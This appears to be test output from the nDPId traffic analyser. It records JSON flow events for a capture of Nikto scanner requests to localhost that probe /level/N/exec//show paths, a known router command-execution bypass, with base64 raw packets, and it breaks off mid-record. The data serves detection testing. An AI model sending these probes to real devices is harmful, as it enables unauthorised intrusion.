-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_packet_id":1,"flow_last_seen":1576420277662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277662,"pkt":"AAAAAAAAAAAAAAAACABFAADIlWJAAEAGpst\/AAABfwAAAcZYH5ApQaxoF8oWWYAYAED+vAAAAQEICp1m\/sadZv7GR0VUIC9sZXZlbC81OS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/59\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001306)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1576420277663,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277663,"pkt":"AAAAAAAAAAAAAAAACABFAADIGkpAAEAGIeR\/AAABfwAAAcZaH5C0PSNBlakojYAYAED+vAAAAQEICp1m\/sedZv7HR0VUIC9sZXZlbC82MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/60\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001307)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1576420277667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277667,"pkt":"AAAAAAAAAAAAAAAACABFAADIoR1AAEAGmxB\/AAABfwAAAcZcH5BUypgTdH6XP4AYAED+vAAAAQEICp1m\/sudZv7LR0VUIC9sZXZlbC82MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/61\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001308)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":1,"flow_last_seen":1576420277669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277669,"pkt":"AAAAAAAAAAAAAAAACABFAADI7qNAAEAGTYp\/AAABfwAAAcZeH5CzGNepEFgF6YAYAED+vAAAAQEICp1m\/s2dZv7NR0VUIC9sZXZlbC82Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/62\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001309)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":1,"flow_last_seen":1576420277670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277670,"pkt":"AAAAAAAAAAAAAAAACABFAADI1RxAAEAGZxF\/AAABfwAAAcZgH5DKr+wUPhtD5IAYAED+vAAAAQEICp1m\/s6dZv7OR0VUIC9sZXZlbC82My9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/63\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001310)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":1,"flow_last_seen":1576420277675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277675,"pkt":"AAAAAAAAAAAAAAAACABFAADI4N9AAEAGW05\/AAABfwAAAcZiH5DpddnYHCFGp4AYAED+vAAAAQEICp1m\/tOdZv7SR0VUIC9sZXZlbC82NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTEpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/64\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001311)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":1,"flow_last_seen":1576420277677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277677,"pkt":"AAAAAAAAAAAAAAAACABFAADIG8lAAEAGIGV\/AAABfwAAAcZkH5CYBSLNt2luhoAYAED+vAAAAQEICp1m\/tWdZv7VR0VUIC9sZXZlbC82NS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/65\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001312)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":1,"flow_last_seen":1576420277678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277678,"pkt":"AAAAAAAAAAAAAAAACABFAADIttNAAEAGhVp\/AAABfwAAAcZmH5DUdY\/bkd0KuYAYAED+vAAAAQEICp1m\/tadZv7WR0VUIC9sZXZlbC82Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/66\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001313)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":1,"flow_last_seen":1576420277680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277680,"pkt":"AAAAAAAAAAAAAAAACABFAADI\/OVAAEAGP0h\/AAABfwAAAcZoH5ACKMXwYFGAmIAYAED+vAAAAQEICp1m\/tidZv7YR0VUIC9sZXZlbC82Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/67\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001314)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":1,"flow_last_seen":1576420277681,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277681,"pkt":"AAAAAAAAAAAAAAAACABFAADIw2NAAEAGeMp\/AAABfwAAAcZqH5BLUvpuf7sPloAYAED+vAAAAQEICp1m\/tmdZv7ZR0VUIC9sZXZlbC82OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTUpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":616,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277681,"flow_last_seen":1576420277681,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50794,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/68\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001315)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":1,"flow_last_seen":1576420277683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277683,"pkt":"AAAAAAAAAAAAAAAACABFAADIBQVAAEAGNyl\/AAABfwAAAcZsH5CyYjwQgGi0OYAYAED+vAAAAQEICp1m\/tudZv7bR0VUIC9sZXZlbC82OS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277683,"flow_last_seen":1576420277683,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50796,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 